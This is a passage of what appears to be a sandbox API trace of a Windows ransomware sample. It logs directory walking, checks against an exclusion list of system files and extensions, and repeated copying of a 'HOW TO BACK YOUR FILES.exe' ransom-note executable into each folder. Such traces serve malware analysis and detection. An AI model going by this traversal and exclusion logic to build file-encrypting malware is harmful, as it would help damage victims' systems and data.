lpString2="C:\\Users\\Default User\\Local Settings\\Microsoft\\Feeds Cache\\1NBUR4HR", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Microsoft\\Feeds Cache\\1NBUR4HR") returned="C:\\Users\\Default User\\Local Settings\\Microsoft\\Feeds Cache\\1NBUR4HR" [0042.251] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e9eb0 | out: hHeap=0x2b0000) returned 1 [0042.251] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d23c0 | out: hHeap=0x2b0000) returned 1 [0042.251] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Microsoft\\Feeds Cache\\1NBUR4HR") returned 67 [0042.251] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Microsoft\\Feeds Cache\\1NBUR4HR" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Microsoft\\Feeds Cache\\1NBUR4HR") returned="C:\\Users\\Default User\\Local Settings\\Microsoft\\Feeds Cache\\1NBUR4HR" [0042.251] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0042.251] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Microsoft\\Feeds Cache\\1NBUR4HR\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\microsoft\\feeds cache\\1nbur4hr\\how to back your files.exe"), bFailIfExists=1) returned 1 [0042.256] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0042.256] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Microsoft\\Feeds Cache\\1NBUR4HR\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4ac2c9c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4ac2c9c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0042.256] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0042.256] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0042.256] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0042.256] FindNextFileW (in: hFindFile=0x2ccea8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4ac2c9c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4ac2c9c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0042.256] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0042.256] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0042.256] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0042.256] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0042.256] FindNextFileW (in: hFindFile=0x2ccea8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x668c5a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x668c5a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfea09ee5, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x43, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0042.256] lstrcmpiW (lpString1="desktop.ini", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0042.256] lstrcmpiW (lpString1="desktop.ini", lpString2="aoldtz.exe") returned 1 [0042.256] lstrcmpiW (lpString1="desktop.ini", lpString2=".") returned 1 [0042.256] lstrcmpiW (lpString1="desktop.ini", lpString2="..") returned 1 [0042.256] lstrcmpiW (lpString1="desktop.ini", lpString2="windows") returned -1 [0042.256] lstrcmpiW (lpString1="desktop.ini", lpString2="bootmgr") returned 1 [0042.256] lstrcmpiW (lpString1="desktop.ini", lpString2="temp") returned -1 [0042.256] lstrcmpiW (lpString1="desktop.ini", lpString2="pagefile.sys") returned -1 [0042.256] lstrcmpiW (lpString1="desktop.ini", lpString2="boot") returned 1 [0042.256] lstrcmpiW (lpString1="desktop.ini", lpString2="ids.txt") returned -1 [0042.256] lstrcmpiW (lpString1="desktop.ini", lpString2="ntuser.dat") returned -1 [0042.257] lstrcmpiW (lpString1="desktop.ini", lpString2="perflogs") returned -1 [0042.257] lstrcmpiW (lpString1="desktop.ini", lpString2="MSBuild") returned -1 [0042.257] lstrlenW (lpString="desktop.ini") returned 11 [0042.257] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Microsoft\\Feeds Cache\\1NBUR4HR\\*") returned 69 [0042.257] lstrcpyW (in: lpString1=0x2e2e8e8, lpString2="desktop.ini" | out: lpString1="desktop.ini") returned="desktop.ini" [0042.257] lstrlenW (lpString="desktop.ini") returned 11 [0042.257] lstrlenW (lpString="Ares865") returned 7 [0042.257] lstrcmpiW (lpString1="top.ini", lpString2="Ares865") returned 1 [0042.257] lstrlenW (lpString=".dll") returned 4 [0042.257] lstrcmpiW (lpString1="desktop.ini", lpString2=".dll") returned 1 [0042.257] lstrlenW (lpString=".lnk") returned 4 [0042.257] lstrcmpiW (lpString1="desktop.ini", lpString2=".lnk") returned 1 [0042.257] lstrlenW (lpString=".ini") returned 4 [0042.257] lstrcmpiW (lpString1="desktop.ini", lpString2=".ini") returned 1 [0042.257] lstrlenW (lpString=".sys") returned 4 [0042.257] lstrcmpiW (lpString1="desktop.ini", lpString2=".sys") returned 1 [0042.257] lstrlenW (lpString="desktop.ini") returned 11 [0042.257] lstrcpyW (in: lpString1=0x2e2e8e8, lpString2="fwlink[1]" | out: lpString1="fwlink[1]") returned="fwlink[1]" [0042.257] lstrlenW (lpString="fwlink[1]") returned 9 [0042.257] lstrlenW (lpString="Ares865") returned 7 [0042.257] lstrcmpiW (lpString1="link[1]", lpString2="Ares865") returned 1 [0042.257] lstrlenW (lpString=".dll") returned 4 [0042.257] lstrcmpiW (lpString1="fwlink[1]", lpString2=".dll") returned 1 [0042.257] lstrlenW (lpString=".lnk") returned 4 [0042.257] lstrcmpiW (lpString1="fwlink[1]", lpString2=".lnk") returned 1 [0042.257] lstrlenW (lpString=".ini") returned 4 [0042.257] lstrcmpiW (lpString1="fwlink[1]", lpString2=".ini") returned 1 [0042.257] lstrlenW (lpString=".sys") returned 4 [0042.257] lstrcmpiW (lpString1="fwlink[1]", lpString2=".sys") returned 1 [0042.257] lstrlenW (lpString="fwlink[1]") returned 9 [0042.257] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Users\\Default User\\Local Settings\\Microsoft\\Feeds", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Microsoft\\Feeds") returned="C:\\Users\\Default User\\Local Settings\\Microsoft\\Feeds" [0042.258] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cb388 | out: hHeap=0x2b0000) returned 1 [0042.258] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d23a0 | out: hHeap=0x2b0000) returned 1 [0042.258] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Microsoft\\Feeds") returned 52 [0042.258] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Microsoft\\Feeds" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Microsoft\\Feeds") returned="C:\\Users\\Default User\\Local Settings\\Microsoft\\Feeds" [0042.258] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0042.258] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Microsoft\\Feeds\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\microsoft\\feeds\\how to back your files.exe"), bFailIfExists=1) returned 1 [0042.267] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0042.267] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Microsoft\\Feeds\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4ac52b20, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4ac52b20, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0042.267] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0042.267] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0042.267] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0042.267] FindNextFileW (in: hFindFile=0x2ccea8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4ac52b20, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4ac52b20, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0042.267] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0042.267] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0042.267] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0042.267] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0042.267] FindNextFileW (in: hFindFile=0x2ccea8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x668c5a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x668c5a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xff107f92, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x1a00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="FeedsStore.feedsdb-ms", cAlternateFileName="FEEDSS~1.FEE")) returned 1 [0042.267] lstrcmpiW (lpString1="FeedsStore.feedsdb-ms", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0042.267] lstrcmpiW (lpString1="FeedsStore.feedsdb-ms", lpString2="aoldtz.exe") returned 1 [0042.267] lstrcmpiW (lpString1="FeedsStore.feedsdb-ms", lpString2=".") returned 1 [0042.267] lstrcmpiW (lpString1="FeedsStore.feedsdb-ms", lpString2="..") returned 1 [0042.267] lstrcmpiW (lpString1="FeedsStore.feedsdb-ms", lpString2="windows") returned -1 [0042.268] lstrcmpiW (lpString1="FeedsStore.feedsdb-ms", lpString2="bootmgr") returned 1 [0042.268] lstrcmpiW (lpString1="FeedsStore.feedsdb-ms", lpString2="temp") returned -1 [0042.268] lstrcmpiW (lpString1="FeedsStore.feedsdb-ms", lpString2="pagefile.sys") returned -1 [0042.268] lstrcmpiW (lpString1="FeedsStore.feedsdb-ms", lpString2="boot") returned 1 [0042.268] lstrcmpiW (lpString1="FeedsStore.feedsdb-ms", lpString2="ids.txt") returned -1 [0042.268] lstrcmpiW (lpString1="FeedsStore.feedsdb-ms", lpString2="ntuser.dat") returned -1 [0042.268] lstrcmpiW (lpString1="FeedsStore.feedsdb-ms", lpString2="perflogs") returned -1 [0042.268] lstrcmpiW (lpString1="FeedsStore.feedsdb-ms", lpString2="MSBuild") returned -1 [0042.268] lstrlenW (lpString="FeedsStore.feedsdb-ms") returned 21 [0042.268] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Microsoft\\Feeds\\*") returned 54 [0042.268] lstrcpyW (in: lpString1=0x2e2e8ca, lpString2="FeedsStore.feedsdb-ms" | out: lpString1="FeedsStore.feedsdb-ms") returned="FeedsStore.feedsdb-ms" [0042.268] lstrlenW (lpString="FeedsStore.feedsdb-ms") returned 21 [0042.268] lstrlenW (lpString="Ares865") returned 7 [0042.268] lstrcmpiW (lpString1="dsdb-ms", lpString2="Ares865") returned 1 [0042.268] lstrlenW (lpString=".dll") returned 4 [0042.268] lstrcmpiW (lpString1="FeedsStore.feedsdb-ms", lpString2=".dll") returned 1 [0042.268] lstrlenW (lpString=".lnk") returned 4 [0042.268] lstrcmpiW (lpString1="FeedsStore.feedsdb-ms", lpString2=".lnk") returned 1 [0042.268] lstrlenW (lpString=".ini") returned 4 [0042.268] lstrcmpiW (lpString1="FeedsStore.feedsdb-ms", lpString2=".ini") returned 1 [0042.268] lstrlenW (lpString=".sys") returned 4 [0042.268] lstrcmpiW (lpString1="FeedsStore.feedsdb-ms", lpString2=".sys") returned 1 [0042.268] lstrlenW (lpString="FeedsStore.feedsdb-ms") returned 21 [0042.268] lstrcpyW (in: lpString1=0x2e2e8ca, lpString2="Microsoft Feeds~" | out: lpString1="Microsoft Feeds~") returned="Microsoft Feeds~" [0042.268] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2d23a0 [0042.268] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x8c) returned 0x2d1ea0 [0042.268] RtlInterlockedPushEntrySList (in: ListHead=0x2e77d0, ListEntry=0x2d23a8 | out: ListHead=0x2e77d0, ListEntry=0x2d23a8) returned 0x2d2388 [0042.268] FindNextFileW (in: hFindFile=0x2ccea8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6320600, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xff0498b1, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~", cAlternateFileName="{5588A~1")) returned 1 [0042.268] lstrcmpiW (lpString1="{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0042.268] lstrcmpiW (lpString1="{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~", lpString2="aoldtz.exe") returned -1 [0042.268] lstrcmpiW (lpString1="{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~", lpString2=".") returned 1 [0042.268] lstrcmpiW (lpString1="{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~", lpString2="..") returned 1 [0042.269] lstrcmpiW (lpString1="{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~", lpString2="windows") returned -1 [0042.269] lstrcmpiW (lpString1="{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~", lpString2="bootmgr") returned -1 [0042.269] lstrcmpiW (lpString1="{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~", lpString2="temp") returned -1 [0042.269] lstrcmpiW (lpString1="{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~", lpString2="pagefile.sys") returned -1 [0042.269] lstrcmpiW (lpString1="{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~", lpString2="boot") returned -1 [0042.269] lstrcmpiW (lpString1="{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~", lpString2="ids.txt") returned -1 [0042.269] lstrcmpiW (lpString1="{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~", lpString2="ntuser.dat") returned -1 [0042.269] lstrcmpiW (lpString1="{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~", lpString2="perflogs") returned -1 [0042.269] lstrcmpiW (lpString1="{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~", lpString2="MSBuild") returned -1 [0042.269] lstrlenW (lpString="{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~") returned 39 [0042.269] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Microsoft\\Feeds\\Microsoft Feeds~") returned 69 [0042.269] lstrcpyW (in: lpString1=0x2e2e8ca, lpString2="{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~" | out: lpString1="{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~") returned="{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~" [0042.269] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2d23c0 [0042.269] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0xba) returned 0x2cb388 [0042.269] RtlInterlockedPushEntrySList (in: ListHead=0x2e77d0, ListEntry=0x2d23c8 | out: ListHead=0x2e77d0, ListEntry=0x2d23c8) returned 0x2d23a8 [0042.269] FindNextFileW (in: hFindFile=0x2ccea8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6320600, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xff0498b1, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~", cAlternateFileName="{5588A~1")) returned 0 [0042.269] FindClose (in: hFindFile=0x2ccea8 | out: hFindFile=0x2ccea8) returned 1 [0042.269] RtlInterlockedPopEntrySList (in: ListHead=0x2e77d0 | out: ListHead=0x2e77d0) returned 0x2d23c8 [0042.269] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Users\\Default User\\Local Settings\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~") returned="C:\\Users\\Default User\\Local Settings\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~" [0042.269] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cb388 | out: hHeap=0x2b0000) returned 1 [0042.269] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d23c0 | out: hHeap=0x2b0000) returned 1 [0042.269] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~") returned 92 [0042.269] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~") returned="C:\\Users\\Default User\\Local Settings\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~" [0042.269] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0042.269] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\microsoft\\feeds\\{5588acfd-6436-411b-a5ce-666ae6a92d3d}~\\how to back your files.exe"), bFailIfExists=1) returned 1 [0042.274] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0042.274] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4ac52b20, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4ac52b20, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0042.275] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0042.275] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0042.275] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0042.275] FindNextFileW (in: hFindFile=0x2ccea8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4ac52b20, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4ac52b20, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0042.275] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0042.275] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0042.275] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0042.275] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0042.275] FindNextFileW (in: hFindFile=0x2ccea8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4ac52b20, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4ac52b20, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0042.275] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0042.275] FindNextFileW (in: hFindFile=0x2ccea8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x668c5a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xff0498b1, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="WebSlices~", cAlternateFileName="WEBSLI~1")) returned 1 [0042.275] lstrcmpiW (lpString1="WebSlices~", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0042.275] lstrcmpiW (lpString1="WebSlices~", lpString2="aoldtz.exe") returned 1 [0042.275] lstrcmpiW (lpString1="WebSlices~", lpString2=".") returned 1 [0042.275] lstrcmpiW (lpString1="WebSlices~", lpString2="..") returned 1 [0042.275] lstrcmpiW (lpString1="WebSlices~", lpString2="windows") returned -1 [0042.275] lstrcmpiW (lpString1="WebSlices~", lpString2="bootmgr") returned 1 [0042.275] lstrcmpiW (lpString1="WebSlices~", lpString2="temp") returned 1 [0042.275] lstrcmpiW (lpString1="WebSlices~", lpString2="pagefile.sys") returned 1 [0042.276] lstrcmpiW (lpString1="WebSlices~", lpString2="boot") returned 1 [0042.276] lstrcmpiW (lpString1="WebSlices~", lpString2="ids.txt") returned 1 [0042.276] lstrcmpiW (lpString1="WebSlices~", lpString2="ntuser.dat") returned 1 [0042.276] lstrcmpiW (lpString1="WebSlices~", lpString2="perflogs") returned 1 [0042.276] lstrcmpiW (lpString1="WebSlices~", lpString2="MSBuild") returned 1 [0042.276] lstrlenW (lpString="WebSlices~") returned 10 [0042.276] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\*") returned 94 [0042.276] lstrcpyW (in: lpString1=0x2e2e91a, lpString2="WebSlices~" | out: lpString1="WebSlices~") returned="WebSlices~" [0042.276] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2d23c0 [0042.276] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0xd0) returned 0x2d40a8 [0042.276] RtlInterlockedPushEntrySList (in: ListHead=0x2e77d0, ListEntry=0x2d23c8 | out: ListHead=0x2e77d0, ListEntry=0x2d23c8) returned 0x2d23a8 [0042.276] FindNextFileW (in: hFindFile=0x2ccea8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x668c5a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xff0498b1, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="WebSlices~", cAlternateFileName="WEBSLI~1")) returned 0 [0042.276] FindClose (in: hFindFile=0x2ccea8 | out: hFindFile=0x2ccea8) returned 1 [0042.276] RtlInterlockedPopEntrySList (in: ListHead=0x2e77d0 | out: ListHead=0x2e77d0) returned 0x2d23c8 [0042.276] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Users\\Default User\\Local Settings\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~") returned="C:\\Users\\Default User\\Local Settings\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~" [0042.276] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d40a8 | out: hHeap=0x2b0000) returned 1 [0042.276] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d23c0 | out: hHeap=0x2b0000) returned 1 [0042.276] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~") returned 103 [0042.276] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~") returned="C:\\Users\\Default User\\Local Settings\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~" [0042.276] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0042.276] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\microsoft\\feeds\\{5588acfd-6436-411b-a5ce-666ae6a92d3d}~\\webslices~\\how to back your files.exe"), bFailIfExists=1) returned 